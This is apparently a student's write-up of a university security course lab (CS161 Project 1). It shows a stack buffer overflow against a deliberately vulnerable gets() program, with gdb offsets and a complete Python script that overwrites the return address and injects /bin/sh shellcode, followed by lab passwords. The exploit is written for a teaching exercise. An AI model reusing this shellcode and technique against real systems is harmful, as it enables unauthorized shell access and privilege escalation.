CS161 Project 1

Project1

Q0 Customizer

• 以customizer - customizer身份获取后续密码
• remus - ilearned

Q1 Remus

• 要求我们使用缓冲区溢出注入代码，由此读取访问受限的文件README

orbit.c

#include <stdio.h>

void orbit()
{
  char buf[8];
  gets(buf);
}

int main()
{
  orbit();
  return 0;
}

• 可以发现gets()没有对读取的输入作越界处理，因此含有缓冲区溢出的隐患
• ./debug-exploit并在第五行处打断点

gdb

(gdb) b 5
(gdb) r
(gdb) x/16x buf
0xbffffc68:     0xbffffd1c      0xb7ffc165      0x00000000      0x00000000
0xbffffc78:     0xbffffc88      0xb7ffc4d3      0x00000000      0xbffffca0
0xbffffc88:     0xbffffd1c      0xb7ffc6ae      0xb7ffc648      0xb7ffefd8
0xbffffc98:     0xbffffd14      0xb7ffc6ae      0x00000001      0xbffffd14
(gdb) i f
Stack level 0, frame at 0xbffffc80:
 eip = 0xb7ffc4ab in orbit (orbit.c:6); saved eip = 0xb7ffc4d3
 called by frame at 0xbffffca0
 source language c.
 Arglist at 0xbffffc78, args:
 Locals at 0xbffffc78, Previous frame's sp is 0xbffffc80
 Saved registers:
  ebp at 0xbffffc78, eip at 0xbffffc7c

• 由此我们获得了我们想要的地址，rip与buf间相差了20个字节

orbit.c

rip (0xbffffc7c)
sfp
compiler padding
buf (0xbffffc68)

• 用如下脚本产生输出，先写20Byte的无用字节，到达地址rip(0xbffffc7c)，我们覆写rip地址处的值为rip+4(0xbffffc80)，使得函数返回地址被篡改为0xbffffc80，再在0xbffffc80处注入SHELLCODE

egg

#!/usr/bin/env python3

import codecs
import sys

sys.stdout = codecs.getwriter("latin1")(sys.stdout.buffer)

dummy = "\x61"
Overwrite = "\x80\xfc\xff\xbf"
SHELLCODE = \
    "\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a" + \
    "\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f" + \
    "\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50" + \
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
for i in range(0,20):
  print(dummy, end = "")
print(Overwrite, end = "")
print(SHELLCODE)

• ./exploit后输入cat README

Relay module [queued message: 2]

Spigel: Comrade Bosik, the idea that a robot is designing Caltopian spacecrafts is beyond absurd.

Bosik: If you’ve ever seen telemetry logs of Spica, you wouldn’t be so naive.

Next username: spica
Next password: alanguage

Q2 Spica